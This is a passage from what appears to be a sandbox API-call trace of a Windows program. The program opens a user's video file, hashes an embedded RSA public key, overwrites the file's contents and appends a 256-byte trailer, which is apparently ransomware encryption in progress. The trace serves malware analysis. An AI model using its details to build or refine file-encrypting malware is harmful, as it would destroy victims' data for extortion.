(lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0192.157] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x361b25e0, ftCreationTime.dwHighDateTime=0x1d8a3d5, ftLastAccessTime.dwLowDateTime=0xf9918970, ftLastAccessTime.dwHighDateTime=0x1d8a6d1, ftLastWriteTime.dwLowDateTime=0xf9918970, ftLastWriteTime.dwHighDateTime=0x1d8a6d1, nFileSizeHigh=0x0, nFileSizeLow=0xed04, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z X z-1ADfCAZUF.mkv", cAlternateFileName="ZXZ-1A~1.MKV")) returned 1 [0192.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3ae0 [0192.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0192.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3ae0 | out: hHeap=0x2c0000) returned 1 [0192.157] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\z X z-1ADfCAZUF.mkv") returned=".mkv" [0192.157] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\z X z-1ADfCAZUF.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\z x z-1adfcazuf.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0192.158] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=60676) returned 1 [0192.158] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0192.162] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xecde, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.162] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0192.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0192.164] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.164] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xed04, lpOverlapped=0x0) returned 1 [0192.166] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0192.166] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.166] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.166] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0192.167] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0192.167] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.167] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0192.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0192.167] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0192.167] GetLastError () returned 0x0 [0192.167] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0192.167] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0192.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0192.168] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0192.168] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0192.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0192.168] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0192.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0192.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0192.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xed00) returned 0x2af5168 [0192.168] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0192.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0192.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0192.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0192.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0192.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3ae0 [0192.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60f8 [0192.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3b28 [0192.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6110 [0192.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6140 [0192.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61a0 [0192.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6158 [0192.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0192.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0192.169] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0192.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0192.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6140 | out: hHeap=0x2c0000) returned 1 [0192.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6158 | out: hHeap=0x2c0000) returned 1 [0192.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61a0 | out: hHeap=0x2c0000) returned 1 [0192.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0192.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61a0 [0192.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0192.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6158 [0192.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0192.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6140 [0192.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0192.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0192.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0192.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0192.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0192.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0192.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0192.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0192.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6158 | out: hHeap=0x2c0000) returned 1 [0192.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0192.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6140 | out: hHeap=0x2c0000) returned 1 [0192.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0192.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0192.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61a0 | out: hHeap=0x2c0000) returned 1 [0192.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0192.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0192.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0192.173] GetCurrentThreadId () returned 0x5d8 [0192.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0192.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae70f8 [0192.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0192.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0192.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0192.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0192.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0192.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0192.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.173] GetCurrentThreadId () returned 0x5d8 [0192.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0192.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0192.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0192.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0192.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0192.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0192.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0192.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61a0 [0192.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0192.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0192.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0192.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0192.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0192.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0192.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0192.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0192.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6140 [0192.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0192.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0192.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0192.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0192.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0192.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0192.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0192.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6158 [0192.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0192.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0192.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0192.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6128 [0192.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0192.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae61b8 [0192.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0192.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0192.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0192.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6188 [0192.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0192.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6170 [0192.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0192.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae61d0 [0192.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6170 | out: hHeap=0x2c0000) returned 1 [0192.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6170 [0192.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6188 | out: hHeap=0x2c0000) returned 1 [0192.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0192.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0192.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0192.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0192.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0192.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6140 | out: hHeap=0x2c0000) returned 1 [0192.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6140 [0192.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0192.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0192.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61a0 | out: hHeap=0x2c0000) returned 1 [0192.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0192.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61d0 | out: hHeap=0x2c0000) returned 1 [0192.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0192.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0192.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0192.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0192.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0192.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6140 | out: hHeap=0x2c0000) returned 1 [0192.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0192.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0192.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0192.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0192.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0192.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0192.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0192.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0192.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0192.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0192.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0192.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0192.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6170 | out: hHeap=0x2c0000) returned 1 [0192.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0192.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61b8 | out: hHeap=0x2c0000) returned 1 [0192.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0192.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6158 | out: hHeap=0x2c0000) returned 1 [0192.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6128 | out: hHeap=0x2c0000) returned 1 [0192.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0192.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0192.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0192.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6110 | out: hHeap=0x2c0000) returned 1 [0192.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3b28 | out: hHeap=0x2c0000) returned 1 [0192.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0192.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0192.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0192.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0192.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0192.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0192.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0192.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0192.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0192.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0192.185] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0xecff, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0xecff, lpOverlapped=0x0) returned 1 [0192.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0192.187] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xed04, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.187] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0192.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0192.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0192.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 